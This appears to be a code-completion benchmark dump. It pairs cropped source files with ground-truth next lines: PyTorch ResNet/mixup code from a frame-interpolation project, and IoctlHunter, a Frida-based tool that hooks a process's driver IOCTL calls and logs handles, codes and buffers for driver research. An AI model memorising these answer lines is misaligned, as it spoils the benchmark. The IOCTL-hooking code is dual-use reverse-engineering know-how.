for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer, self.avg_downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x, target=None, mix_type="vanilla", mixup_alpha=None, num_base_classes=-1,
use_hard_positive_aug=False, add_noise_level=0., mult_noise_level=0., minimum_lambda=0.5,
hpa_type="none", label_sharpening=True, label_mix="vanilla", label_mix_threshold=0.2,
exp_coef=1., cutmix_prob=1., num_similar_class=3, classifiers=None,
gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):
if "mixup_hidden" in mix_type:
layer_mix = random.randint(0, 3)
else:
layer_mix = None
out = x
if mixup_alpha is not None:
lam = get_lambda(mixup_alpha)
# https://github.com/YU1ut/MixMatch-pytorch/blob/master/train.py#L243
if use_hard_positive_aug:
lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0:
|
def load_state_dict_from_url(url, model_dir=None, map_location=None, progress=True):
r"""Loads the Torch serialized object at the given URL.
If the object is already present in `model_dir`, it's deserialized and
returned. The filename part of the URL should follow the naming convention
``filename-<sha256>.ext`` where ``<sha256>`` is the first eight or more
digits of the SHA256 hash of the contents of the file. The hash is used to
ensure unique names and to verify the contents of the file.
The default value of `model_dir` is ``$TORCH_HOME/checkpoints`` where
environment variable ``$TORCH_HOME`` defaults to ``$XDG_CACHE_HOME/torch``.
``$XDG_CACHE_HOME`` follows the X Design Group specification of the Linux
filesytem layout, with a default value ``~/.cache`` if not set.
Args:
url (string): URL of the object to download
model_dir (string, optional): directory in which to save the object
map_location (optional): a function or a dict specifying how to remap storage locations (see torch.load)
progress (bool, optional): whether or not to display a progress bar to stderr
Example:
>>> state_dict = torch.hub.load_state_dict_from_url('https://s3.amazonaws.com/pytorch/models/resnet18-5c106cde.pth')
"""
# Issue warning to move data if old env is set
if os.getenv('TORCH_MODEL_ZOO'):
warnings.warn('TORCH_MODEL_ZOO is deprecated, please use env TORCH_HOME instead')
if model_dir is None:
torch_home = _get_torch_home()
model_dir = os.path.join(torch_home, 'checkpoints')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# Directory already exists, ignore.
pass
else:
# Unexpected OSError, re-raise.
raise
parts = urlparse(url)
filename = os.path.basename(parts.path)
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
sys.stderr.write('Downloading: "{}" to {}\n'.format(url, cached_file))
hash_prefix = HASH_REGEX.search(filename).group(1)
_download_url_to_file(url, cached_file, hash_prefix, progress=progress)
return torch.load(cached_file, map_location=map_location)
def _download_url_to_file(url, dst, hash_prefix, progress):
file_size = None
u = urlopen(url)
meta = u.info()
if hasattr(meta, 'getheaders'):
content_length = meta.getheaders("Content-Length")
else:
content_length = meta.get_all("Content-Length")
if content_length is not None and len(content_length) > 0:
file_size = int(content_length[0])
# We deliberately save it in a temp file and move it after
# download is complete. This prevents a local working checkpoint
# being overriden by a broken download.
dst_dir = os.path.dirname(dst)
f = tempfile.NamedTemporaryFile(delete=False, dir=dst_dir)
try:
if hash_prefix is not None:
sha256 = hashlib.sha256()
with tqdm(total=file_size, disable=not progress,
unit='B', unit_scale=True, unit_divisor=1024) as pbar:
while True:
buffer = u.read(8192)
if len(buffer) == 0:
break
f.write(buffer)
if hash_prefix is not None:
sha256.update(buffer)
pbar.update(len(buffer))
f.close()
if hash_prefix is not None:
digest = sha256.hexdigest()
if digest[:len(hash_prefix)] != hash_prefix:
raise RuntimeError('invalid hash value (expected "{}", got "{}")'
.format(hash_prefix, digest))
shutil.move(f.name, dst)
finally:
f.close()
if os.path.exists(f.name):
os.remove(f.name)
ENV_TORCH_HOME = 'TORCH_HOME'
ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
DEFAULT_CACHE_DIR = '~/.cache'
HASH_REGEX = re.compile(r'-([a-f0-9]*)\.')
def _get_torch_home():
torch_home = os.path.expanduser(
os.getenv(ENV_TORCH_HOME,
os.path.join(os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch')))
return torch_home
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
'wide_resnet50_2', 'wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None, avg_downsample=False):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
self.avg_downsample = avg_downsample
self.avgpool = nn.AvgPool2d(2, stride=2, ceil_mode=True)
self.pad = (0, 0, 0, 0, (planes - inplanes) // 2, (planes - inplanes) // 2)
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
if self.avg_downsample:
x = self.avgpool(x)
identity = nn.functional.pad(x, self.pad)
else:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None, avg_downsample=False):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.num_classes = num_classes
self.dilation = 1
self.avg_downsample = avg_downsample
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if avg_downsample:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=1, padding=3, bias=False)
else:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes,bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer, self.avg_downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x, target=None, mix_type="vanilla", mixup_alpha=None, num_base_classes=-1,
use_hard_positive_aug=False, add_noise_level=0., mult_noise_level=0., minimum_lambda=0.5,
hpa_type="none", label_sharpening=True, label_mix="vanilla", label_mix_threshold=0.2,
exp_coef=1., cutmix_prob=1., num_similar_class=3, classifiers=None,
gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):
if "mixup_hidden" in mix_type:
layer_mix = random.randint(0, 3)
else:
layer_mix = None
out = x
if mixup_alpha is not None:
lam = get_lambda(mixup_alpha)
# https://github.com/YU1ut/MixMatch-pytorch/blob/master/train.py#L243
if use_hard_positive_aug:
lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0: | out, target_reweighted, mix_label_mask = middle_mixup_process(out, target_reweighted, num_base_classes, | 1 | 2023-10-25 16:50:51+00:00 | 4k |
megvii-research/WACV2024-SAFA | model/flownet.py | [
{
"identifier": "warp",
"path": "model/warplayer.py",
"snippet": "def warp(tenInput, tenFlow, mode='bilinear'):\n k = (str(tenFlow.device), str(tenFlow.size()))\n if k not in backwarp_tenGrid:\n tenHorizontal = torch.linspace(-1.0, 1.0, tenFlow.shape[3]).view(1, 1, 1, tenFlow.shape[3]).expand(tenFlow.shape[0], -1, tenFlow.shape[2], -1)\n tenVertical = torch.linspace(-1.0, 1.0, tenFlow.shape[2]).view(1, 1, tenFlow.shape[2], 1).expand(tenFlow.shape[0], -1, -1, tenFlow.shape[3])\n backwarp_tenGrid[k] = torch.cat([ tenHorizontal, tenVertical ], 1).to(device)\n\n tenFlow = torch.cat([ tenFlow[:, 0:1, :, :] / ((tenInput.shape[3] - 1.0) / 2.0), tenFlow[:, 1:2, :, :] / ((tenInput.shape[2] - 1.0) / 2.0) ], 1)\n\n g = (backwarp_tenGrid[k] + tenFlow).permute(0, 2, 3, 1)\n return torch.nn.functional.grid_sample(input=tenInput, grid=g, mode=mode, padding_mode='border', align_corners=True)"
},
{
"identifier": "Head",
"path": "model/head.py",
"snippet": "class Head(nn.Module):\n def __init__(self, c):\n super(Head, self).__init__()\n model = models.resnet18(pretrained=False)\n self.cnn0 = nn.Sequential(*nn.ModuleList(model.children())[:3])\n self.cnn1 = nn.Sequential(\n *list(model.children())[3:5],\n )\n self.cnn2 = nn.Sequential(\n *list(model.children())[5:6],\n )\n self.out0 = nn.Conv2d(64, c, 1, 1, 0)\n self.out1 = nn.Conv2d(64, c, 1, 1, 0)\n self.out2 = nn.Conv2d(128, c, 1, 1, 0)\n self.normalize = MeanShift([0.485, 0.456, 0.406], [0.229, 0.224, 0.225], norm=True).to(device) \n def forward(self, x):\n x = self.normalize(x)\n f0 = self.cnn0(x)\n f1 = self.cnn1(f0)\n f2 = self.cnn2(f1)\n f0 = self.out0(f0)\n f1 = F.interpolate(self.out1(f1), scale_factor=2.0, mode=\"bilinear\")\n f2 = F.interpolate(self.out2(f2), scale_factor=4.0, mode=\"bilinear\")\n return f0 + f1 + f2"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
from model.warplayer import warp
from model.head import Head | 1,723 |
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__()
|
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__() | self.convimg = Head(c) | 1 | 2023-10-26 09:24:29+00:00 | 4k |
Z4kSec/IoctlHunter | ioctl_hunter/lib/hooking.py | [
{
"identifier": "State",
"path": "ioctl_hunter/lib/state.py",
"snippet": "class State:\n results = Results()\n\n script = None\n cur_proc = None\n\n quiet = False\n running = True\n hook_enabled = False\n debug_enabled = False\n hex_out_enabled = False\n\n included_drivers = []\n only_driver_handles = True"
},
{
"identifier": "get_ioctl_code_details",
"path": "ioctl_hunter/utils/misc.py",
"snippet": "def get_ioctl_code_details(ioctl_code):\n int_ioctl_code = int(ioctl_code)\n device = (int_ioctl_code >> 16) & 0xFFFF\n access = (int_ioctl_code >> 14) & 3\n function = (int_ioctl_code) >> 2 & 0xFFF\n method = int_ioctl_code & 3\n return hex(device), hex(access), hex(function), hex(method)"
},
{
"identifier": "get_hex_from_hexdump",
"path": "ioctl_hunter/utils/misc.py",
"snippet": "def get_hex_from_hexdump(hexdump):\n hex = \"\"\n for chunck in hexdump.split(\"\\n\")[1:]:\n hex += chunck[12:][:47].replace(\" \", \"\")\n return hex"
},
{
"identifier": "get_frida_script_content",
"path": "ioctl_hunter/utils/misc.py",
"snippet": "def get_frida_script_content():\n script_path = resource_filename(\"ioctl_hunter.frida\", \"script.ts\")\n f = open(script_path, mode=\"r\")\n script_content = f.read()\n f.close()\n return script_content"
},
{
"identifier": "print_ioctl",
"path": "ioctl_hunter/ui/display.py",
"snippet": "def print_ioctl(my_dict):\n if State.debug_enabled:\n return False\n\n logger.result(\"\")\n logger.result(\"-\" * 20)\n logger.result(\"\")\n\n logger.result(f\"Symbol:\\t\\t{my_dict['symbol']}\")\n logger.result(f\"Device path:\\t{my_dict['handle_path']}\")\n logger.result(\n f\"Device handle:\\t{my_dict['handle_device']['dec']}\\t({my_dict['handle_device']['hex']})\"\n )\n\n logger.result(\n f\"Ioctl code:\\t\\t{my_dict['ioctl']['dec']}\\t({my_dict['ioctl']['hex']})\"\n )\n logger.result(f\"\\t- Device:\\t{my_dict['ioctl']['details']['device']}\")\n logger.result(f\"\\t- Access:\\t{my_dict['ioctl']['details']['access']}\")\n logger.result(f\"\\t- Function:\\t{my_dict['ioctl']['details']['function']}\")\n logger.result(f\"\\t- Method:\\t{my_dict['ioctl']['details']['method']}\")\n\n logger.result(f\"Input buffer size:\\t{my_dict['buff_in']['size']}\")\n logger.result(f\"Hexdump input buffer:\\n{my_dict['buff_in']['hexdump']}\")\n\n logger.result(f\"Output buffer size:\\t{my_dict['buff_out']['size']}\")\n logger.result(f\"Returned bytes:\\t{my_dict['buff_out']['bytes_returned']}\")\n if State.hex_out_enabled:\n logger.result(f\"Hexdump output buffer:\\n{my_dict['buff_out']['hexdump']}\")\n logger.result(\"\")\n logger.result(\"-\" * 20)\n logger.result(\"\")\n return True"
},
{
"identifier": "print_loaded_driver",
"path": "ioctl_hunter/ui/display.py",
"snippet": "def print_loaded_driver(loaded_driver):\n if State.debug_enabled:\n return False\n logger.warning(\"\")\n logger.warning(\"-\" * 30)\n logger.warning(\"\")\n logger.warning(f\"New dynamically loaded driver:\")\n logger.warning(f\"\\t- SvcName:\\t{loaded_driver['name']}\")\n logger.warning(f\"\\t- RegKey:\\t{loaded_driver['key']}\")\n logger.warning(f\"\\t- ImagePath:\\t{loaded_driver['image_path']}\")\n logger.warning(\"\")\n logger.warning(\"-\" * 30)\n logger.warning(\"\")\n return True"
},
{
"identifier": "print_final_recap",
"path": "ioctl_hunter/ui/display.py",
"snippet": "def print_final_recap():\n logger.info(\"\")\n logger.info(\"\")\n print_enable_debugger()\n logger.info(\"\")\n logger.info(\"\")\n logger.info(\"End of the hunt !\")\n logger.info(\"Exiting...\")"
}
] | import ast
import time
import frida
import psutil
import logging
import datetime
from urllib.parse import unquote
from .state import State
from ..utils.misc import (
get_ioctl_code_details,
get_hex_from_hexdump,
get_frida_script_content,
)
from ..ui.display import print_ioctl, print_loaded_driver, print_final_recap | 1,785 |
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver)
|
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
